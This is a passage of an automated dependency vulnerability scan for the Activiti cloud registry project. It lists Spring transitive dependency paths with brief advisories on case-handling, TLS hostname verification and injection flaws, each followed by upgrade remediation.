  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10

Overview

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.

Remediation

Upgrade org.springframework:spring-context to version 6.1.14 or higher.

References

Improper Handling of Case Sensitivity vulnerability report

low severity
new

Improper Validation of Certificate with Host Mismatch

  • Vulnerable module: org.springframework.boot:spring-boot-autoconfigure
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1, org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2

Overview

Affected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch due to establishing SSL connections to Cassandra without verifying that the hostname in the server's SSL certificate actually matched the hostname of the server being connected to. While the application might have verified that the certificate was signed by a trusted Certificate Authority (CA), failing to verify the hostname means an attacker could present any valid certificate (even one meant for a different domain) to successfully intercept the connection, leaving the application vulnerable to Man-in-the-Middle (MitM) attacks.

Remediation

Upgrade org.springframework.boot:spring-boot-autoconfigure to version 3.5.14, 4.0.6 or higher.

References

Improper Validation of Certificate with Host Mismatch vulnerability report

low severity
new

Improper Validation of Certificate with Host Mismatch

  • Vulnerable module: org.springframework.boot:spring-boot-autoconfigure
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1, org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2

Overview

Affected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch when using an SSL bundle. This effectively weakens TLS by allowing connections without verifying the server identity (classic MITM risk).

Remediation

Upgrade org.springframework.boot:spring-boot-autoconfigure to version 3.5.14, 4.0.6 or higher.

References

Improper Validation of Certificate with Host Mismatch vulnerability report

low severity

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

  • Vulnerable module: org.springframework:spring-web
  • Introduced through: org.springframework.boot:spring-boot-starter-web@4.1.0-RC1, org.springframework.cloud:spring-cloud-starter-config@5.0.3 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework:spring-web@7.0.3
